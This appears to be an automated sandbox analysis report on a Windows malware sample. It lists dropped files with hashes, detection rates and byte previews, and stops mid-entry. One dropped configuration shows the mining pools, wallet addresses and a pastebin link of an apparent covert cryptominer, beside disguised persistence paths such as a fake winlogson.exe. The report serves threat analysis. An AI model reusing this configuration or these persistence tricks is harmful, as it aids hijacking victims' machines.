                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                • Filename: NH95Vhokye.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Eulen.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: U9jAFGWgPG.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: ICBM.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: ICBM.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: ICBM.exe, Detection: malicious, Browse
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\ProgramData\Dllhost\winlogson.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):142859
                                                                                                                                                                                Entropy (8bit):6.093600683917465
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:Nvqn3jix8o8mDnFAZ5Lwt8tmLdz4AZ2VIzy:NSzix8ofi5LQ8tmvZq+y
                                                                                                                                                                                MD5:F069DEF83E0CD619EF6C3BAE22C13460
                                                                                                                                                                                SHA1:1A252278AD1210E8F143FBAD91A5A465884BE603
                                                                                                                                                                                SHA-256:8082CC574D2A456BD76BB61EAAB0B24D6882964E3A739CEC8510C242E0B48783
                                                                                                                                                                                SHA-512:65973458CA18C6E725C3EAA8D88C53B74C3739322613C0B8EA765465F198B060C6F9F29BFBDD8A9E5B981ADB110A970E152C55BA9152792920D749032689939E
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....c.d...............&.._...}...2............@.............................0......L|~...`... .................................................F...@...\....v.................l...........................`.t.(......................@............................text....._......._.................`..`.data...`.... _...... _.............@....rdata.......0`......&`.............@..@.pdata........v.......v.............@..@.xdata........y.......x.............@..@.bss......2...|..........................idata...F......H....|.............@....CRT....h.... ........|.............@....tls.........0........|.............@....rsrc....\...@...\....|.............@....reloc..l............X}.............@..B........................................................................................................................................................................

                                                                                                                                                                                C:\ProgramData\HostData\logs.uce

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):344
                                                                                                                                                                                Entropy (8bit):5.684574010345154
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:DiYgE/ovKDMcPmriYgE/ovKDMcBCrT5fhXGT2QSBa5ydXnzAiGUlQPoy68f1KAKZ:uwgyXmGwgyoH55GT2Qtyc3n1KAi
                                                                                                                                                                                MD5:FAC0827324A254D56B80351D3A0A676C
                                                                                                                                                                                SHA1:7140E81D0844422A4F1EB9C083D0E3F8B195CC89
                                                                                                                                                                                SHA-256:A12A06E88A3E1AD525A1F9D10227CF015C516705094DBEEC67BB1275B36064D1
                                                                                                                                                                                SHA-512:F84F82A35500701F6E80D926399B9C21B287A4A13981E7B646A26AAA831E53335EBF832ACAB367D01A778F1A35A0336C62938F66800D51CB2E00577113EEE122
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..XMR..pool.hashvault.pro:443..ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t..Dnepr..F(Ff4f67h((jgf..cp..https://pastebin.com/raw/dq3hWX27..

                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PqSIlYOaIF.exe_ec61bd5e64dc2812a2956594a1fa2656db7ca8b_3710a74f_ae1f14d9-059b-4a64-a5f0-db7211456617\Report.wer

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):0.7068193665747422
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:m/i/USP0l1r0BU/HyhyCju1zuiF/Z24IO8Umya:95P0l14BU/SECjczuiF/Y4IO8Ura
                                                                                                                                                                                MD5:47887EA95C21FD4D7FA8252E4864203A
                                                                                                                                                                                SHA1:66BEA685A036D1670388929FDFD873B7F6115A27
                                                                                                                                                                                SHA-256:F068A73E684A9F5E5CC6F68369601A0B189EADF9546123C107C34663ACA46F17
                                                                                                                                                                                SHA-512:B1710E1785D12D34814031C5CF4D3FA258309AE9861933025300FA51CD5BA162817A3C63365DEB826D1916994E906DCAC70D63A8ADA4201AB477778CCABF131B
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.7.0.0.2.8.8.0.0.1.5.3.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.7.0.0.2.8.9.1.1.0.9.0.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.1.f.1.4.d.9.-.0.5.9.b.-.4.a.6.4.-.a.5.f.0.-.d.b.7.2.1.1.4.5.6.6.1.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.f.1.9.e.c.0.-.6.8.6.5.-.4.c.1.8.-.a.7.1.d.-.4.7.5.5.a.e.e.4.a.6.7.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.q.S.I.l.Y.O.a.I.F...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.6.8.-.0.0.0.1.-.0.0.1.4.-.8.2.5.1.-.7.a.1.0.4.9.3.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.a.d.b.a.d.1.9.3.5.3.1.a.9.4.8.6.6.8.4.b.b.2.e.5.9.6.b.d.a.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.a.f.2.1.b.9.2.2.9.c.7.8.b.f.e.b.1.d.f.d.2.a.8.9.8.0.2.9.b.a.e.1.e.1.0.7.5.b.d.!.P.q.S.I.l.Y.O.a.I.F...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER6732.tmp.dmp

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Sun Nov 10 08:18:08 2024, 0x1205a4 type
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):35404
                                                                                                                                                                                Entropy (8bit):1.7705850859261256
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:5q813trvnbwsIDC4Z8S08JjFJGeei73Kv+lli3m+rl9lyFx9LWZCWIkWIv9IwShk:7T6/xzeOZlb+rl9lyFxZOtShtF2bH
                                                                                                                                                                                MD5:97B5ECF54C163D798092759F4C2BF9EA
                                                                                                                                                                                SHA1:7F433B247ACA1EB7E228169DB224BF6803433FB3
                                                                                                                                                                                SHA-256:A765959A063B50F9F4D4CD0E665B15FFCBBE9C695C15B04C2BECEAC0DD46A70C
                                                                                                                                                                                SHA-512:F72306727B30E6154137B389DB514F062901BF102240001E9F9705C1ADB057D6A425E4C38B7BB272413DBE1216D5B9D7863453B108488F58B51245C7E02DDA2B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:MDMP..a..... .......@l0g........................X...............Z...........T.......8...........T...............\~......................................................................................................eJ......x.......GenuineIntel............T.......h...;l0g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER688B.tmp.WERInternalMetadata.xml

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):8406
                                                                                                                                                                                Entropy (8bit):3.698274942992004
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:R6l7wVeJ05B6FdSte6YcDBSUrZMgmfWy1prs89bWGsf0N0ym:R6lXJ0f66U6Y2SUNMgmfWyBWlfr
                                                                                                                                                                                MD5:3BFDDAFFA40CC8A8044FB127F02CD9D3
                                                                                                                                                                                SHA1:0BA50ABBA816CAC4AB5A10EDBD125BA860D5DE4C
                                                                                                                                                                                SHA-256:27D574FB2B261FA448C0BA854AC62F9EBFF28FECB16F5CD270BBDB944B18CC3A
                                                                                                                                                                                SHA-512:4652A56902F6E3A069C8133088AA25BDB8A26E2130B1A663D2CD4E9773ED925E95EC866D8B3578A89524AF61DCECF2D50C82F333AFD7CEECFE08356345E17D30
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.8.4.<./.P.i.

                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER6909.tmp.xml

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):4720
                                                                                                                                                                                Entropy (8bit):4.491195822332011
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:cvIwWl8zsJJg77aI9XGtDG+WpW8VYkYm8M4JwibEFj+q8vvbfnx+N3ad:uIjfbI7VGtDG/7V8Jw+WKDfnx+N3ad
                                                                                                                                                                                MD5:A8387C119DD816CDD6F672DF21C57DF8
                                                                                                                                                                                SHA1:9C3AEDDF09E6C8F1147FFA909CDD31DFF45DD541
                                                                                                                                                                                SHA-256:6ED4EBFADABC3C65E8AAD6C4F8C364BC834193A32870AE1D4EDF6559AD4B09EA
                                                                                                                                                                                SHA-512:D8A688417D6D9C4A44A3D1341B8858F2805EC43E72998B3C05B11855EBE33EAF62B169277F57E5FC94D293AE92C033270CCAF3790D977EEEB36E82E20EB76726
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="581720" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2232
                                                                                                                                                                                Entropy (8bit):5.379677338874509
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//8PUyus:tLHxvIIwLgZ2KRHWLOug8s
                                                                                                                                                                                MD5:0409BC4E22C202C47D580902DAA656F4
                                                                                                                                                                                SHA1:FF4E4FD1293C724A149AE0A1128D7B02CEFAED17
                                                                                                                                                                                SHA-256:028122B959E6E45EC84CE434E2266AC3296C0ADAB2A37C391E0DEDFCA1823206
                                                                                                                                                                                SHA-512:6710C3E7F5822EB83F2C5228117076D73D4785AE7A7121733B5D248D9059BDDF920D750D44717B80D2E1B19E24EC276C9EFCF7DF840E3F8D73F0E1CA35C2E5E3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\PqSIlYOaIF.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3125704
                                                                                                                                                                                Entropy (8bit):7.990259949871784
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:49152:MN5JrWK2CToOR1ewbLQZ5reodSTgYSFLDJzIAMAAAedMnMbw0gvbP/+3jxYQzbPI:MN5JrW2oo1ewbLQzegSTgNFLDRR4KMbw
                                                                                                                                                                                MD5:CE901A874C9D157E48F83B1BE3D32AA6
                                                                                                                                                                                SHA1:9BC12D5DB437C0673437E9FEAADD0027887D1C13
                                                                                                                                                                                SHA-256:35401B151F704F6BBBF4F8B36D886E4DC391809822181B396C02D243C0ACA7F0
                                                                                                                                                                                SHA-512:EA6511B4E318EB31E4DD8862CD7967906BD1705F2B1D6422B28424F0C810F9647702315B9BDCEA1FD32421E5D72B61027E9991DA6B779D6DE02B61E410EEB747
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: inject.exe, Detection: malicious, Browse
                                                                                                                                                                                Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@.................................X.0..............................................0...N...........u/..<..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....N...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjg0lgug.wxv.psm1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nh2teink.4vz.ps1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbaxeltq.qjq.ps1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zd4wimqv.oir.psm1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\logs.uce

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):344
                                                                                                                                                                                Entropy (8bit):5.684574010345154
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:DiYgE/ovKDMcPmriYgE/ovKDMcBCrT5fhXGT2QSBa5ydXnzAiGUlQPoy68f1KAKZ:uwgyXmGwgyoH55GT2Qtyc3n1KAi
                                                                                                                                                                                MD5:FAC0827324A254D56B80351D3A0A676C
                                                                                                                                                                                SHA1:7140E81D0844422A4F1EB9C083D0E3F8B195CC89
                                                                                                                                                                                SHA-256:A12A06E88A3E1AD525A1F9D10227CF015C516705094DBEEC67BB1275B36064D1
                                                                                                                                                                                SHA-512:F84F82A35500701F6E80D926399B9C21B287A4A13981E7B646A26AAA831E53335EBF832ACAB367D01A778F1A35A0336C62938F66800D51CB2E00577113EEE122
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..XMR..pool.hashvault.pro:443..ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t..Dnepr..F(Ff4f67h((jgf..cp..https://pastebin.com/raw/dq3hWX27..

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\7z.dll

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1679360
                                                                                                                                                                                Entropy (8bit):6.278252955513617
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                                                                MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                                SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                                SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                                SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\7z.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe
                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):468992
                                                                                                                                                                                Entropy (8bit):6.157743912672224
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                                                                                                                                                MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                                                SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                                                SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\KillDuplicate.cmd

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):222
                                                                                                                                                                                Entropy (8bit):4.855194602218789
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                                                                                                                                                MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                                                SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
